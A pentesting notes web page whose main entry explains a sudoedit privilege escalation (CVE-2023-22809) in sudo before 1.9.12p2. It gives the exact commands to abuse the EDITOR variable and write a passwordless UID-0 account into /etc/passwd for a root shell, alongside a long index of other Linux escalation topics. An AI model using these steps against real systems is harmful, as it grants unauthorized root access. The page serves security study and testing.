Exploit Notes

Exploits related to Linux

Privilege Escalation

Ansible Playbook Privilege Escalation

Apache Conf Privilege Escalation

Bash eq Privilege Escalation

Buffer Overflow Privilege Escalation

Chrome Remote Debugger Pentesting

Doas Privilege Escalation

LXC/LXD (Linux Container/Daemon) Privilege Escalation

Linux Privilege Escalation

Mozilla Pentesting

OpenSSL Privilege Escalation

PolKit Privilege Escalation

Privilege Escalation with Wildcard Injection

Python Jails Escape

Python Privilege Escalation

Python Yaml Privilege Escalation

Ruby Privilege Escalation

Snapd Privilege Escalation

Sudo ClamAV Privilege Escalation

Sudo Dstat Privilege Escalation

Sudo Exiftool Privilege Escalation

Sudo Fail2ban Privilege Escalation

Sudo Git Privilege Escalation

Sudo Java Privilege Escalation

Sudo OpenVPN Privilege Escalation

Sudo Path Traversal Privilege Escalation

Sudo Privilege Escalation

Sudo Privilege Escalation by Overriding Shared Library

Sudo Reboot Privilege Escalation

Sudo Screen Privilege Escalation

Sudo Service Privilege Escalation

Sudo Shutdown, Poweroff Privilege Escalation

Sudo Systemctl Privilege Escalation

Sudo Tee Privilege Escalation

Sudo Umount Privilege Escalation

Sudo Vim Privilege Escalation

Sudo Wall Privilege Escalation

Sudo Wget Privilege Escalation

Sudoedit Privilege Escalation

Update-Motd Privilege Escalation

Post Exploitation

Linux Backdoors

Linux Pivoting

Backup

BorgBackup Pentesting

Container

LXC/LXD (Linux Container/Daemon) Privilege Escalation

Others

Archived Files

Linux Techniques

Linux Troubleshooting

Linux User & File Management

X11 (X Window System) Pentesting

Sudoedit Privilege Escalation

Last modified: 2023-03-11

Privilege Escalation

Sudoedit is vulnerable to privilege escalation.

Investigation

sudo -l

(root) sudoedit /opt/example.txt

If we can execute sudoedit command as root, we might be able to escalate the privileges with some version.

Exploitation (CVE-2023-22809)

In sudo version before 1.9.12p2, the sudoedit can modify arbitrary file with unrestricted privilege.

export EDITOR="vim -- /etc/passwd"
sudo sudoedit /opt/example.txt

In vim editor, add the following new line in /etc/passwd.

sudoedit::0:0:root:/root:/bin/bash

Now we can get a root shell.

References

https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.